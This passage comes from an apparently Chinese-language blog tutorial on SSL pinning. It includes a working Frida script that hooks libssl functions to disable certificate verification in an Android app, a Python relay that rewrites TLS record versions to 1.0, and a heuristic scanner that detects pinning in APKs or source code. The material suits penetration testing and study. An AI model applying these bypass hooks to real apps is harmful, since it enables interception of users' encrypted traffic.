    libssl.so exports (SSL_CTX_set_verify and SSL_get_peer_certificate) when
    they can be found. The function then blocks on stdin until EOF so the
    script stays loaded, and detaches from the process on the way out.
    """
    # Attach to the target process
    device = frida.get_usb_device()
    session = device.attach("com.example.app")

    try:
        # Inject the script
        script = session.create_script("""
// 内存补丁绕过SSL Pinning
function patch_ssl_verification() {
// 查找证书验证函数
var verify_cert_addr = Module.findExportByName("libssl.so", "SSL_CTX_set_verify");
if (verify_cert_addr) {
console.log("[+] Found SSL_CTX_set_verify at: " + verify_cert_addr);

// 替换函数实现
Interceptor.replace(verify_cert_addr, new NativeCallback(function(ctx, mode, callback) {
console.log("[+] SSL_CTX_set_verify called, disabling verification");
// 设置为不验证证书
return 0;
}, 'int', ['pointer', 'int', 'pointer']));
}

// 查找证书固定检查函数
var pin_check_addr = Module.findExportByName("libssl.so", "SSL_get_peer_certificate");
if (pin_check_addr) {
console.log("[+] Found SSL_get_peer_certificate at: " + pin_check_addr);

// 替换函数实现
Interceptor.replace(pin_check_addr, new NativeCallback(function(ssl) {
console.log("[+] SSL_get_peer_certificate called, returning null");
// 返回null,跳过证书检查
return ptr(0);
}, 'pointer', ['pointer']));
}
}

// 执行补丁
patch_ssl_verification();
""")

        script.on('message', on_message)
        script.load()

        # Keep the script alive until stdin is closed
        sys.stdin.read()
    finally:
        # Always release the target process, even on error or Ctrl-C.
        session.detach()

网络层绕过

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
# Python脚本:网络层SSL Pinning绕过
import socket
import ssl
import struct

class SSLProxy:
    """Single-shot TCP relay that rewrites the first TLS record it sees.

    For each accepted connection it reads one chunk from the client, rewrites
    the TLS record header, forwards it to the remote server, reads one chunk
    of response and sends that back. Connections are handled one at a time.
    Intended for authorised protocol testing.
    """

    def __init__(self, local_port, remote_host, remote_port):
        self.local_port = local_port
        self.remote_host = remote_host
        self.remote_port = remote_port
        self.server_socket = None

    def start_proxy(self):
        """Listen on localhost:``local_port`` and serve clients forever.

        The listening socket is closed when the loop is left for any reason.
        """
        self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            self.server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            self.server_socket.bind(('localhost', self.local_port))
            self.server_socket.listen(5)

            print(f"[+] SSL Proxy started on port {self.local_port}")

            while True:
                client_socket, addr = self.server_socket.accept()
                print(f"[+] New connection from {addr}")

                self.handle_client(client_socket)
        finally:
            self.server_socket.close()

    def handle_client(self, client_socket):
        """Relay one request/response pair for ``client_socket``.

        Errors are printed, not raised. The client socket is always closed
        before returning, including when the client sent nothing.
        """
        try:
            data = client_socket.recv(4096)
            if not data:
                return

            tls_record = self.parse_tls_record(data)
            modified_data = self.modify_tls_record(tls_record)

            # The context manager closes the upstream socket on every path.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as server_socket:
                server_socket.connect((self.remote_host, self.remote_port))
                # sendall: send() may transmit only part of the buffer.
                server_socket.sendall(modified_data)
                response = server_socket.recv(4096)

            modified_response = self.modify_server_response(response)
            client_socket.sendall(modified_response)

        except Exception as e:
            print(f"[-] Error handling client: {e}")
        finally:
            client_socket.close()

    def parse_tls_record(self, data):
        """Split the first TLS record in ``data`` into its header fields.

        Returns:
            None if fewer than 5 bytes are available, otherwise a dict with
            'content_type' (int), 'version' (int), 'length' (declared payload
            length) and 'payload' (bytes actually present, possibly shorter
            than 'length').
        """
        if len(data) < 5:
            return None

        content_type, version, length = struct.unpack('>BHH', data[:5])

        return {
            'content_type': content_type,
            'version': version,
            'length': length,
            'payload': data[5:5 + length],
        }

    def modify_tls_record(self, tls_record):
        """Re-serialise a parsed record with its version set to TLS 1.0.

        The input dict is left untouched. The length written to the header is
        the size of the payload actually held, so the output is a well-formed
        record even if the original was only partially received.

        Returns:
            The rebuilt record bytes, or ``b''`` when ``tls_record`` is falsy.
        """
        if not tls_record:
            return b''

        payload = tls_record['payload']
        header = struct.pack(
            '>BHH',
            tls_record['content_type'],
            0x0301,  # record-layer version for TLS 1.0
            len(payload),
        )
        return header + payload

    def modify_server_response(self, response):
        """Hook for altering the server's response; returns it unchanged."""
        return response

# 使用示例
if __name__ == "__main__":
    # Relay local port 8443 to example.com:443.
    proxy = SSLProxy(8443, "example.com", 443)
    proxy.start_proxy()

检测与防护

SSL Pinning检测

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
# Python脚本:检测SSL Pinning
import re
import os
from pathlib import Path

class SSLPinningDetector:
    """Heuristic scanner that looks for signs of SSL pinning in an app.

    Works on either an ``.apk`` file or a source directory and records every
    hit in ``pinning_indicators``. Matching is plain substring / regex search,
    so a hit is a hint to investigate, not proof of pinning.
    """

    # Case-insensitive substrings searched for in DEX files.
    _DEX_STRINGS = (
        'CertificatePinner',
        'TrustKit',
        'SSLContext',
        'X509TrustManager',
        'checkServerTrusted',
        'pinning',
        'certificate',
        'sha256',
        'public-key-pins',
    )

    # Case-insensitive regexes searched for in source files.
    _SOURCE_PATTERNS = (
        r'CertificatePinner',
        r'TrustKit',
        r'SSLContext',
        r'X509TrustManager',
        r'checkServerTrusted',
        r'pinning',
        r'certificate.*pin',
        r'sha256.*pin',
    )

    def __init__(self, app_path):
        self.app_path = app_path
        self.pinning_indicators = []

    def detect_android_ssl_pinning(self):
        """Scan ``app_path`` and report whether any indicator was found.

        Returns:
            True on the first hit; False if nothing matched or the path is
            neither an ``.apk`` file name nor an existing directory.
        """
        path = os.fspath(self.app_path)

        if path.endswith('.apk'):
            return self.detect_apk_ssl_pinning()

        if os.path.isdir(path):
            return self.detect_source_ssl_pinning()

        return False

    def detect_apk_ssl_pinning(self):
        """Scan the DEX files and XML/JSON resources inside the APK.

        Errors while opening or reading the archive are printed and treated
        as "nothing found".
        """
        import zipfile

        try:
            with zipfile.ZipFile(self.app_path, 'r') as apk:
                names = apk.namelist()

                # Multidex apps ship classes2.dex, classes3.dex, ... as well.
                for name in names:
                    if re.fullmatch(r'classes\d*\.dex', name):
                        if self.scan_dex_for_pinning(apk.read(name)):
                            return True

                for name in names:
                    if name.endswith(('.xml', '.json')):
                        if self.scan_resources_for_pinning(apk.read(name)):
                            return True

        except Exception as e:
            print(f"[-] Error analyzing APK: {e}")

        return False

    def scan_dex_for_pinning(self, dex_data):
        """Search raw DEX bytes for pinning-related strings.

        Every matching string is appended to ``pinning_indicators``.

        Returns:
            True if at least one string matched.
        """
        # Lower-case the haystack once instead of once per needle.
        haystack = dex_data.decode('utf-8', errors='ignore').lower()

        found_indicators = [s for s in self._DEX_STRINGS if s.lower() in haystack]

        if found_indicators:
            self.pinning_indicators.extend(found_indicators)
            return True

        return False

    def scan_resources_for_pinning(self, resource_data):
        """Search one resource file for pinning configuration.

        Looks for a ``pin-set`` element (network security configuration) and
        for any mention of TrustKit. Trust-anchor ``certificates`` entries
        alone are not reported, since they do not pin anything.

        Returns:
            True if an indicator was found and recorded.
        """
        # Compiled resources may store strings as UTF-16; dropping NUL
        # characters lets the same substring search work for both encodings.
        resource_str = resource_data.decode('utf-8', errors='ignore').replace('\x00', '')

        if 'pin-set' in resource_str:
            self.pinning_indicators.append('network_security_config')
            return True

        if 'trustkit' in resource_str.lower():
            self.pinning_indicators.append('trustkit_config')
            return True

        return False

    def detect_source_ssl_pinning(self):
        """Walk the source tree and scan Java/Kotlin/Swift/Obj-C files.

        Returns:
            True as soon as one file matches, otherwise False.
        """
        for root, _dirs, files in os.walk(self.app_path):
            for file in files:
                if file.endswith(('.java', '.kt', '.swift', '.m', '.h')):
                    if self.scan_source_file(os.path.join(root, file)):
                        return True

        return False

    def scan_source_file(self, file_path):
        """Search one source file for pinning-related patterns.

        The first matching pattern is recorded as ``"<path>: <pattern>"``.
        Read errors are printed and treated as "no match".
        """
        try:
            with open(file_path, 'r', encoding='utf-8', errors='ignore') as f:
                content = f.read()

            for pattern in self._SOURCE_PATTERNS:
                if re.search(pattern, content, re.IGNORECASE):
                    self.pinning_indicators.append(f"{file_path}: {pattern}")
                    return True

        except Exception as e:
            print(f"[-] Error scanning file {file_path}: {e}")

        return False

    def get_pinning_indicators(self):
        """Return the list of indicators collected so far."""
        return self.pinning_indicators

# 使用示例
if __name__ == "__main__":
    # Scan app.apk and list whatever indicators were recorded.
    detector = SSLPinningDetector("app.apk")
    has_pinning = detector.detect_android_ssl_pinning()

    if has_pinning:
        print("[+] SSL Pinning detected!")
        print("Indicators:")
        for indicator in detector.get_pinning_indicators():
            print(f" - {indicator}")
    else:
        print("[-] No SSL Pinning detected")

结语

SSL/TLS协议是现代网络安全的基础,理解其工作原理对于网络安全研究和渗透测试至关重要。

本文关键点

  • 协议深度:从TLS握手到证书验证的完整流程分析
  • 绕过技术:从Frida Hook到内存补丁的多种绕过方法

这篇内容和之前几篇网络安全基础内容都有关联以及一些补充,其中有不太理解的地方欢迎私聊一起探讨

持续输出技术分享,您的支持将鼓励我继续创作!